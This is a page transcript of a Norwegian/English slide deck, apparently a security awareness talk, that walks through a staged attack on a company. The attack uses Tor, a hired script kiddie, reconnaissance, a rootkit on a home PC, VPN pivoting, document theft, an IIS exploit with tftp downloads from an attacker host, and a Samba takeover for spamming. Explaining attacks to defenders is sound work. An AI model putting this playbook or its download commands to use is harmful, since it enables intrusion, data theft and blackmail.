The attack Ronny Windvik Kjetil Mosesen. Agenda Security issues Scenario for the attack The attack.

Slides:



Advertisements
Liknende presentasjoner
TCP/IP-modellen.
Advertisements

Tankekart FreeMind.
Webprogrammering (LO113A) 1 Kom i gang med PHP. Webprogrammering (LO113A) 2 Mål  Installere Apache og PHP  Konfigurasjon av Apache og PHP  Forstå samspillet.
File sharing in peer to peer Netwoks Samson og Rune 27. september 2004.
Everyone Print Kalle Snarheim.
DaTaTing Hva er internett? •Verdensomspennende nettverk av nettverk. •I likhet med mennesker, kan ikke datamaskiner kommunisere med hverandre gjennom et.
Unix Amir Maqbool Ahmed
Eksterne sikkerhetsproblemer og trusler Med fokus på Windows nettverk.
Ledelsesinformasjonsystem
KLINISK SYKEPLEIE SEPTEMBER 2008 HANNE ELISE HAUG Kurs i informasjonskompetanse.
Nettverk Software Protocol Hierarchies
Klient - server nettverk Et nettverk består (ofte) av en (eller flere) server(e), og mange klienter. Klientene bruker tjenester levert av servere(ne).
Nettverk Software Protocol Hierarchies
Klient - server nettverk Et nettverk består (ofte) av en (eller flere) server(e), og mange klienter. Klientene bruker tjenester levert av servere(ne).
Protokoller Pensum: Olsen, kap. 5 og 6. Kommunikasjon Er en viktig del, kanskje den viktigste del, av moderne databehandling Med det får vi tilgang til.
Member Access Ny prosedyre for registrering og innlogging på RI’s medlemsdatabase Member Access. Denne prosedyren gjelder ALLE rotarianere.
Oppkobling VPN.
Men hva mener de som har klart det? Børge Haugset (NTNU&SINTEF)
Når ble pragmatisk slukt av Smidig ? Joachim Haagen Skeie, Smidig 2011.
1 Information search for the research protocol in IIC/IID Medical Library, 2013.
Hvordan virker Internett
Hvordan lage seg en wikispaces Gå til bestem deg for hvilket wikispaces du vil ha (public, protected, private).
Se opp for halen!. Tenker vi på brukeren? Studie: Hvilke egenskaper (oppgaver) er viktigst? 93 valgmuligheter Uansett oppdeling «super task» – 12%
© UNIVERSITETETS SENTER FOR INFORMASJONSTEKNOLOGI UNIVERSITETET I OSLO USIT Side 1 Installering av Windows XP med PXE (netboot) Del 1 – forhåndskonfigurering.
Framside.
Planning and controlling a project Content: Results from Reflection for action The project settings and objectives Project Management Project Planning.
Malvik Videregående Skole Overvåking av brukeraktivitet og fjerndistribuering av Windows 2003 Server.
Kerberos System som kan brukes til å sette opp en sikker forbindelse med en server Bruker delte hemmelige nøkler Basert på Needham-Schroeder autentifikasjonsprotokoll.
Grunnkurs IT-ansvarlige
Modellering og diagrammer Jesper Tørresø DAB1 E september 2007.
© UNIVERSITETETS SENTER FOR INFORMASJONSTEKNOLOGI UNIVERSITETET I OSLO USIT Side 1 Sikkerhet – er maskinen min hacket? (litt om verktøy og hvordan maskinen.
The attack Håvard Ibenholt Meldahl Dataetterforsker – Ibas AS
Reporting the crime The investingation
Protokoller Pensum: Olsen, kap. 5 og 6. Kommunikasjonsprotokoll Rutiner for å administrere og kontrollere oversending av data Telefonsamtale (”Hallo”,
© UNIVERSITETETS SENTER FOR INFORMASJONSTEKNOLOGI UNIVERSITETET I OSLO USIT Side 1 Daily maskinene rapporterer fra innsiden Loggdelen.
Geografiske informasjonssystemer (GIS) SGO1910 & SGO4930 Vår 2004 Foreleser: Karen O’Brien Seminarleder: Gunnar Berglund
© UNIVERSITETETS SENTER FOR INFORMASJONSTEKNOLOGI UNIVERSITETET I OSLO USIT Side 1 Sikkerhet – hvordan ser en hacket maskin ut? Elisabeth Høidal Strøm.
Digital Portfolios – a tool for assessment and learning Asgjerd Vea Karlsen Eli Kari Høihilder.
Linked Data 2: Hvordan KoG31 Uke 8, 2013.
Norwegian Ministry of Labour and Social Affairs Engelsk mal: Startside Tips norsk mal Velg ASD mal NORSK under ”oppsett”. Social inclusion for people from.
The Thompson Schools Improvement Project Process Improvement Training Slides (Current State Slides Only) October 2009.
Primary French Presentation 10 Colours L.I. C’est de quelle couleur?
Prosesser ● En prosess er ett program som kjøre ● Alle prosesser har ● En katalog i /proc ● En ID ● En Forelder (ikke init) ● Prosess eier (Bruker ID)
Find Fraud B4 it Finds You!
Digital bestillingsprosess for Armering, direkte fra modell
MikS WP1/WP2 Planned work from SINTEF.
Title: «How to use different tools and/or machines in the workshop»
Frigjørende evangelium Rom 8 og Gal. 2 Lov eller evangelium Krav eller løfte Noe du skal oppfylle eller noe som er blitt oppfylt for deg Dåp Bekymringer.
Citation and reference tools for your master thesis
Eksempel fra Nevrologisk avdeling
Dette er et eksempel på plassering av logoene.
Ole Kristoffer Dybvik Apeland Nkom
CAMPAIGNING From vision to action.
Using nursery rhymes and songs
Slide 2:. Forretningsmodellen forklart på engelsk og norsk
Citation and reference tools for your master thesis
Welcome to an ALLIN (ALLEMED) workshop!
SS-generasjonen HL-senteret,
Project Honolulu - An Island or a new way to manage servers ????????
Hva er det gode liv for universitetet eller høgskolen?
Slide 2:. Forretningsmodellen forklart på engelsk og norsk
Dynamisk DNS registrering for Windows 10
Slide 2:. Forretningsmodellen forklart på engelsk og norsk
Slide 2:. Forretningsmodellen forklart på engelsk og norsk
Vaccine Delivery in Developing Countries
Sustainability as practice
LO2 – Understand Computer Software
Behind the scene Anders Hattestad ,
How to evaluate effects of inspections on the quality of care?
Utskrift av presentasjonen:

The attack Ronny Windvik Kjetil Mosesen

Agenda Security issues Scenario for the attack The attack

Attacker’s goal All networks/computers are on the Internet ”We wish to attack an organisation and our aim is financial gain ”

Anonymity on the Internet, TOR (The Onion Router)

Onion Routing Onion Routing is a distributed overlay network designed to anonymize TCP-based applications like web browsing, secure shell, and instant messaging. Clients choose a path through the network and build a circuit, in which each node (or “onion router” or “OR”) in the path knows its predecessor and successor, but no other nodes in the circuit. Traffic flows down the circuit in fixed-size cells, which are unwrapped by a symmetric key at each node (like the layers of an onion) and relayed downstream.

Scenario Localisation of home office computers in the company –Is done through a proxy server and a webserver in Sweden Paying a script kiddie to install a rootkit on selected home computers? –Script kiddie: A person who attacks computer systems using ready made scripts. –Uses an anonymous network: allows you to connect into our network and do all your internet activities from our network. Think of it like coming into our "internet cafe" and using one of our computers. Anything you do does not reveal your identity because you are doing all your internet activities like web surfing from our computers, not yours The script kiddis uses a rootkit and an open VPN-tunnel in to the company for the attack

Protection of the home computer –Firewall Router with Firewall and NAT –Direct acess to the computer Modem Broadband router with no firewall –In this case, the home computer can be accessed from the Internet

Starting point

The attack on a selected company Information collecting rendering addresses Picking out internal and external IP-adresses –Search for open unprotected services –Take over the home computer end install a rootkit Find teh VPN-connection to the company –Collect information in the company’s domain –Access confidential information/documents – for further sale/blackmail –Take over a linux server in the company – send out Spam –Take over the company’s web server –Install rootkits wherever possible –Place evidence so the employer gets the blame

Information collection Webpages DNS News groups IP-range ( What we get: –A set of valid addresses in the company –The IP-range –The Mappingen between IP-adresses and computer names

Information is collected on the attacker’s web server Alle som åpner e-posten kontakter automatisk vår webtjener Innholder en logg med alle IP-adresser som besøker den Slår opp IP-adressene for å finne ut hvilke som tilhører bredbåndsleverandører Vet også hvilke brukernavn/e-postnavn som tilhører hvilke IP- adresse Hjemme PC

Information collection, IP-adresses

Charting use of home PC Ønsker å finne ut når hjemme PC-en er i bruk –Utføres via proxy i Sverige Hver IP-pakke har et ”Identification” på 16-bit Benyttes til å fragmentere/dele opp IP-pakker Alle fragmenter av en IP-pakke med ID=X får også ID=X ID = 1313

Charting use of home PC

The script kiddie Benytter en script-kiddie til å ta over hjemme PC-en Script-kiddie jobber via anonymiseringsnettverket Hjemme PC-en er ikke beskyttet av en brannmur Innleid hjelp

Active information collection with NMAP Innleid hjelp

Nmap ("Network Mapper") Nmap ("Network Mapper") is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free software, available with full source code under the terms of the GNU GPL.

Active information collection NetBIOS Avslører hvem som er logget inn og medlemskap i domene Innleid hjelp

Takes over home office client Innleid hjelp

Rootkits, leaving back doors –Programs Skjermsparere, fildelingsprogrammer, … Java Scripts, Applets, Active X,... –Modifiserte systemkommandoer dir, ps, who, ifconfig, su, login, net, … –Kernel rootkit Lastbare kjernemoduler, (IPSec-modul) Device drivere

Installing a rootkit on the home computer The script kiddie installs a rootkit on the home computer Rootkit aktiveres ved å sende en ICMP-echo-reply eller -time –Åpner da en port for å gi tilgang til hjemme PC-en –Kan også sette hjemme PC-en til å kontakte oss –All trafikk er kryptert –Returnerer et cmd-vindu til oss Rootkit er passordbeskyttet og ikke synlig i noen logger på hjemme PC-en Den innleide script-kiddie er nå ferdig med sin del Innleid hjelp

Script-kiddie takes over home computer

Sees a VPN-tunnel defined in Windows

Tests VPN tunnel

Damage done Har utnyttet tilliten til hjemmekontor PC-en i bedriften sitt domene Har samlet inn mye bedriftsinterne dokumenter Informasjonen kan selges til konkurrenter, aksjespekulanter eller andre som mulighet for utpressing

Collecting document

Attack on company’s web server Betingelser –Web-tjeneren/serveren er en Windows maskin –Kjører Internet Information Server (IIS) (web-tjeneren til Microsoft) –Har ikke installert patchene for feilene/sikkerhetshullene vi skal utnytte

Security holes 1.Bug in IIS –Kan få kjørt de fleste programmer på web-tjeneren –Eksternt 2.Faulty access rights Kan få kjørt programmer som Administrator –Lokalt

Bug in IIS (BID 2708) Internet Information Services - a powerful Web server Hvordan få startet og kjørt programmer på web-tjeneren ? tftp –i hacker_box.com GET FIL.exe C:\temp\FIL.exe rename min-fil.htm C:\inetpub\wwwroot\default.htm

Faults in controlling access rights How to run programs as Administrator ? Utnytter en feil i hvordan prosesser/programmer internt i en Windows maskin kommuniserer –Forenklet sagt spoofer vi også her avsenderen, ved å kjøre et program kalt HK.EXE –For programmet som mottar, vil det alltid se ut som om det er et program med Administratorrettigheter som er avsender

Changing the web server www angriper Start tftp, og send med parameterene tftp –i GET /tftp-dir/HK.exe c:\inetpub\wwwroot\HK.exe Ulovlig innhold

Changing the web server wwwangriper Kjør HK.exe (gir Administrator rettigheter) Legg nedlastet fil som hjemmeside Se på den nye hjemmesiden

Changing the web server

Attackin the comapny’s server E-posttjeneren viser seg å være sårbar for et Samba exploit Gir oss root rettigheter

Taking over server, sending SPAM

What happened Kartlagt hjemmekontorbrukere for en utvalgt bedrift Leid inn en script-kiddie til å overta hjemmekontor PC-en Brukt tillit hjemmekontor PC-en har til å komme inn i bedriften Samlet inn bedriftsinterne dokumenter Overtatt webtjener og lagt ut ulovlig innhold Overtatt e-posttjeneren og sendt ut mye SPAM Mye gjort via anonymiseringsnettverk Men, ikke alt…

Tilbakemelding: Konfidensialitetspolitikk Tilbakemelding
Om prosjektet: SlidePlayer Bruksavtale

© 2024 SlidePlayer.no Inc. All rights reserved.